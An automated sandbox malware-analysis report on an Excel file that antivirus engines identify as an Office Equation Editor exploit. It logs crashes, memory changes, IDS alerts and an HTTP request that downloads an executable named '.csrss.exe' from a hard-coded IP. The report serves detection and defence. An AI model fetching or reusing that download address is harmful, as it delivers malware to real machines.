Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 3, 2021, 6:27 p.m.	Aug. 3, 2021, 6:29 p.m.

Size	1.3MB
Type	CDFV2 Encrypted
MD5	`39ca085ce4df97ba36a9a61666be7b3f`
SHA256	`c88a80b5cf8453b2d5772f5f23c45d4b68df093ed2e3c9efc37d86fa14e34880`
CRC32	`328A2640`
ssdeep	`24576:DuNtXV6zrpkCK2/i9nGYkkZ4FUHI/tW97ioEugJTN2GvTHYnId0:DGeeIit2M/HIVWRiTnTN2GvLBa`
Yara	Microsoft_Office_File_Zero - Microsoft Office File

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\2670767360cnf.xlsx
420

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
103.155.82.200	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 103.155.82.200:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 103.155.82.200:80 -> 192.168.56.103:49162	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 103.155.82.200:80 -> 192.168.56.103:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 103.155.82.200:80 -> 192.168.56.103:49162	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 103.155.82.200:80 -> 192.168.56.103:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 3, 2021, 6:27 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75121414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68 MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512 MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97 MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664 LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9 MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481 MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8 MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7 MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x754fb727 registers.esp: 3694480 registers.edi: 1963915792 registers.eax: 3694480 registers.ebp: 3694560 registers.edx: 0 registers.ebx: 130065508 registers.esi: 2147944126 registers.ecx: 3259209945	1	0	0
__exception__ Aug. 3, 2021, 6:27 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x750db641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x750db5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x750db172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x750da66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x7515a68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x751377e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x751214b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68 MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512 MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97 MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664 LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9 MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481 MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8 MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7 MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x754fb727 registers.esp: 3694172 registers.edi: 1963915792 registers.eax: 3694172 registers.ebp: 3694252 registers.edx: 0 registers.ebx: 130064860 registers.esi: 2147944122 registers.ecx: 3259209945	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 3, 2021, 6:27 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75121414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68
MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e
MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512
MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97
MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664
LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f
LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9
MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481
MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f
MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8
MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7
MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe
MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x754fb727
registers.esp: 3694480
registers.edi: 1963915792
registers.eax: 3694480
registers.ebp: 3694560
registers.edx: 0
registers.ebx: 130065508
registers.esi: 2147944126
registers.ecx: 3259209945

__exception__

Aug. 3, 2021, 6:27 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x750db641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x750db5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x750db172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x750da66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x7515a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x751377e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x751214b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68
MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e
MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512
MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97
MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664
LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f
LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9
MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481
MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f
MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8
MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7
MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe
MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x754fb727
registers.esp: 3694172
registers.edi: 1963915792
registers.eax: 3694172
registers.ebp: 3694252
registers.edx: 0
registers.ebx: 130064860
registers.esi: 2147944122
registers.ecx: 3259209945

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://103.155.82.200/msword/.csrss.exe

Performs some HTTP requests (1 event)

request

GET http://103.155.82.200/msword/.csrss.exe

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 3, 2021, 6:27 p.m.	process_identifier: 420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bbc4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2021, 6:27 p.m.	process_identifier: 420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ba2a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2021, 6:27 p.m.	process_identifier: 420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b8c2000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process EXCEL.EXE with pid 420 crashed
__exception__ Aug. 3, 2021, 6:27 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75121414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68 MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512 MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97 MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664 LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9 MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481 MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8 MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7 MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x754fb727 registers.esp: 3694480 registers.edi: 1963915792 registers.eax: 3694480 registers.ebp: 3694560 registers.edx: 0 registers.ebx: 130065508 registers.esi: 2147944126 registers.ecx: 3259209945	1	0	0
__exception__ Aug. 3, 2021, 6:27 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x750db641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x750db5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x750db172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x750da66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x7515a68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x751377e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x751214b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68 MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512 MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97 MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664 LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9 MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481 MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8 MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7 MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x754fb727 registers.esp: 3694172 registers.edi: 1963915792 registers.eax: 3694172 registers.ebp: 3694252 registers.edx: 0 registers.ebx: 130064860 registers.esi: 2147944122 registers.ecx: 3259209945	1	0	0

Application Crash

Process EXCEL.EXE with pid 420 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 3, 2021, 6:27 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75121414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68
MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e
MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512
MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97
MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664
LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f
LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9
MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481
MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f
MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8
MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7
MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe
MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5

__exception__

Aug. 3, 2021, 6:27 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7683374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x751df725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7684414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x751dc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x750d98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x750db641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x750db5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x750db172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x750da66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x7515a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x751377e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x751214b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75137b68
MdCallBack12-0x20ac9c excel+0x47750e @ 0xd1750e
MdCallBack12-0x3a0c98 excel+0x2e1512 @ 0xb81512
MdCallBack12-0x3e1613 excel+0x2a0b97 @ 0xb40b97
MdCallBack12-0x3eeb46 excel+0x293664 @ 0xb33664
LinkASPPModelTable+0x11c18d MdCallBack-0x330faf excel+0xac172f @ 0x136172f
LinkASPPModelTable+0x11c317 MdCallBack-0x330e25 excel+0xac18b9 @ 0x13618b9
MdCallBack12-0x134d29 excel+0x54d481 @ 0xded481
MdCallBack12-0x662a0b excel+0x1f79f @ 0x8bf79f
MdCallBack12-0x66d0e2 excel+0x150c8 @ 0x8b50c8
MdCallBack12-0x66e9c3 excel+0x137e7 @ 0x8b37e7
MdCallBack12-0x67d4ac excel+0x4cfe @ 0x8a4cfe
MdCallBack12-0x67d76a excel+0x4a40 @ 0x8a4a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76e333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77969ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77969ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x754fb727
registers.esp: 3694172
registers.edi: 1963915792
registers.eax: 3694172
registers.ebp: 3694252
registers.edx: 0
registers.ebx: 130064860
registers.esi: 2147944122
registers.ecx: 3259209945

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$2670767360cnf.xlsx

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Aug. 3, 2021, 6:27 p.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000478 filepath: C:\Users\test22\AppData\Local\Temp\~$2670767360cnf.xlsx desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$2670767360cnf.xlsx create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 3, 2021, 6:27 p.m.	process_identifier: 420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef60000 process_handle: 0xffffffff	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

103.155.82.200

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Lionic	Trojan.MSWord.Generic.4!c
ALYac	Exploit.CVE-2018-0802.Gen
Arcabit	Exploit.CVE-2018-0802.Gen
Symantec	Trojan.Gen.NPE
ESET-NOD32	probably a variant of Win32/Exploit.CVE-2017-11882.F
Avast	OLE:CVE-2017-11882-B [Expl]
BitDefender	Exploit.CVE-2018-0802.Gen
MicroWorld-eScan	Exploit.CVE-2018-0802.Gen
Tencent	Exp.Ole.CVE-2018-0802.a
Ad-Aware	Exploit.CVE-2018-0802.Gen
Emsisoft	Exploit.CVE-2018-0802.Gen (B)
McAfee-GW-Edition	Exploit-GBY!5B7173B3A38B
FireEye	Exploit.CVE-2018-0802.Gen
Ikarus	Trojan-Downloader.Office.Crypt
Microsoft	Exploit:O97M/CVE-2017-11882.SMK!MTB
GData	Exploit.CVE-2018-0802.Gen
TACHYON	Suspicious/W97.CVE-2018-0798
McAfee	Exploit-GBR!000000000000
MAX	malware (ai score=100)
Fortinet	MSOffice/CVE_2018_0798!tr
AVG	OLE:CVE-2017-11882-B [Expl]

2670767360cnf.xlsx

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All